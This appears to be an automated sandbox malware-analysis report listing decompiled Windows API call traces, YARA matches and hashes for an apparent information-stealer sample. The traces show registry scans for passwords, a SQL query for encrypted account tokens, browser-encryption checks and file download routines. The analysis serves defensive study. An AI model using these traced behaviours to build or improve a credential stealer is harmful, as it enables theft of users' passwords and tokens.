                                            • Part of subcall function 022E94C7: lstrlen.KERNEL32(?), ref: 022E950E
                                            • Part of subcall function 022E94C7: wsprintfA.USER32 ref: 022E952E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E16C6
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E170E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E1755
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E179D
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E17E5
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E182C
                                          • lstrcpy.KERNEL32(?,00000000), ref: 022E1874
                                            • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                            • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                          • strtok_s.MSVCRT ref: 022E19B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                          • String ID:
                                          • API String ID: 4276352425-0
                                          • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                          • Instruction ID: 4158661848786d2b51a9c44eb49494a0d5e03b6db320aeb1cc2c92dc8bf085f8
                                          • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                          • Instruction Fuzzy Hash: AE7165B5960218ABCF14EBE0DC88EEE737AAF55300F444599A10FA2144EE755B84DF61
                                          APIs
                                          • memset.MSVCRT ref: 00407314
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                          • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                            • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                          • task.LIBCPMTD ref: 00407555
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                          • String ID: Password
                                          • API String ID: 2698061284-3434357891
                                          • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                          • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                          • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                          • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                          APIs
                                          • lstrcatA.KERNEL32(?,0097B750,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                          • lstrcatA.KERNEL32(?,?), ref: 00414820
                                          • lstrcatA.KERNEL32(?,?), ref: 00414834
                                          • lstrcatA.KERNEL32(?,009491C8), ref: 00414847
                                          • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                          • lstrcatA.KERNEL32(?,0097BB60), ref: 0041486F
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                            • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                            • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                            • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                            • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                          • String ID: 0aA
                                          • API String ID: 167551676-2786531170
                                          • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                          • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                          • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                          • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0097B6D8,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0097B6D8,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                          • __aulldiv.LIBCMT ref: 00418172
                                          • __aulldiv.LIBCMT ref: 00418180
                                          • wsprintfA.USER32 ref: 004181AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                          • String ID: %d MB$@
                                          • API String ID: 2886426298-3474575989
                                          • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                          • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                          APIs
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                            • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                            • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                            • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                          • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022D6376
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D63AE
                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022D63F6
                                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022D641A
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 022D6443
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022D6471
                                          • CloseHandle.KERNEL32(?,?,00000400), ref: 022D64B0
                                          • InternetCloseHandle.WININET(?), ref: 022D64BA
                                          • InternetCloseHandle.WININET(00000000), ref: 022D64C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 4287319946-0
                                          • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                          • Instruction ID: 587547d62c2b6e8abd2c63fb14d3436c13b1492aa1deaff21fe3c776ead07939
                                          • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                          • Instruction Fuzzy Hash: AF517FB5A60318ABDF20DFE0DC44BEE7779AB44705F408098F605A72C4DBB46A89CF95
                                          APIs
                                          • memset.MSVCRT ref: 022E4FEE
                                            • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E5017
                                          • lstrcat.KERNEL32(?,00421000), ref: 022E5034
                                            • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                            • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                          • memset.MSVCRT ref: 022E507A
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E50A3
                                          • lstrcat.KERNEL32(?,00421020), ref: 022E50C0
                                            • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                            • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                            • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                            • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                          • memset.MSVCRT ref: 022E5106
                                          • lstrcat.KERNEL32(?,00000000), ref: 022E512F
                                          • lstrcat.KERNEL32(?,00421038), ref: 022E514C
                                            • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C17
                                            • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022E4C2C
                                            • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C49
                                            • Part of subcall function 022E4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022E4C85
                                            • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,0064A524), ref: 022E4CB1
                                            • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022E4CC3
                                            • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CD7
                                            • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022E4CE9
                                            • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CFD
                                            • Part of subcall function 022E4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022E4D13
                                            • Part of subcall function 022E4B77: DeleteFileA.KERNEL32(?), ref: 022E4D98
                                          • memset.MSVCRT ref: 022E5192
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID:
                                          • API String ID: 4017274736-0
                                          • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                          • Instruction ID: db05b167b2f9cd16b0adcd5423be81d2d0db33ff3aefd49a6bcb9afd82be81d1
                                          • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                          • Instruction Fuzzy Hash: 4741D679A5031467DB10F7F0EC46FED3739AB24701F804494B68A660C4EEB897D88F92
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022E8397
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022E839E
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022E83BF
                                          • __aulldiv.LIBCMT ref: 022E83D9
                                          • __aulldiv.LIBCMT ref: 022E83E7
                                          • wsprintfA.USER32 ref: 022E8413
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                          • String ID: @
                                          • API String ID: 2774356765-2766056989
                                          • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction ID: 2b9d2c89cc79d323a96f5a89d2ba8a7fd6ae12c1c4badfe6e585ced312a11b55
                                          • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction Fuzzy Hash: 29214AB1E54218ABDB00DFD4DC49FAEB7B9FB44B04F504609F616BB284C7B869008BA5
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                          • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                          • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                          • API String ID: 1440504306-1079375795
                                          • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                          • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                          • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                          • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess$DefaultLangUser
                                          • String ID: B
                                          • API String ID: 1494266314-2248957098
                                          • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                          • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                          • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                          • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                          APIs
                                          • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                          • memset.MSVCRT ref: 00409EE8
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                          • API String ID: 1977917189-1096346117
                                          • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                          • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                          • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                          • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                          APIs
                                            • Part of subcall function 022D7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                            • Part of subcall function 022D7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                            • Part of subcall function 022D7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                            • Part of subcall function 022D7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
                                            • Part of subcall function 022D7537: HeapFree.KERNEL32(00000000), ref: 022D76C0
                                          • lstrcat.KERNEL32(0064A668,004217FC), ref: 022D786D
                                          • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78AF
                                          • lstrcat.KERNEL32(0064A668,00421800), ref: 022D78C1
                                          • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78F6
                                          • lstrcat.KERNEL32(0064A668,00421804), ref: 022D7907
                                          • lstrcat.KERNEL32(0064A668,00000000), ref: 022D793A
                                          • lstrcat.KERNEL32(0064A668,00421808), ref: 022D7954
                                          • task.LIBCPMTD ref: 022D7962
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                          • String ID:
                                          • API String ID: 2677904052-0
                                          • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                          • Instruction ID: cf4a7821771cdac8e22ca8d66d6d36e0a275f20a70a445ebae946f91aeec6ae1
                                          • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                          • Instruction Fuzzy Hash: 3F314FB6A50209EFCB04EBE0DC94DFE7776EB49301F105018E106A7294DA34E942CF52
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                          • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                          • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                          • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                          • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                          • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                          • InternetCloseHandle.WININET(?), ref: 004050C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                          • String ID:
                                          • API String ID: 3894370878-0
                                          • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                          • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                          • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                          • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022D5231
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D5238
                                          • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022D5251
                                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022D5278
                                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022D52A8
                                          • memcpy.MSVCRT(00000000,?,00000001), ref: 022D52F1
                                          • InternetCloseHandle.WININET(?), ref: 022D5320
                                          • InternetCloseHandle.WININET(?), ref: 022D532D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                          • String ID:
                                          • API String ID: 1008454911-0
                                          • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                          • Instruction ID: ee2c64580d4dec94019297141c0432774384836935dac6d87814800b00e75967
                                          • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                          • Instruction Fuzzy Hash: 0A31F9B4A40218ABDB20CF94DC89BDCB7B5EB48704F5081D9F609A7284D7B46AC5CF59
                                          APIs
                                            • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                            • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022E58AB
                                          • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022E5908
                                          • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022E5ABE
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022E5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022E548F
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022E5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                            • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5596
                                            • Part of subcall function 022E5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                            • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E55EA
                                            • Part of subcall function 022E5527: strtok.MSVCRT(00000000,?), ref: 022E5605
                                            • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5615
                                          • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022E59F2
                                          • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022E5BA7
                                          • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022E5C73
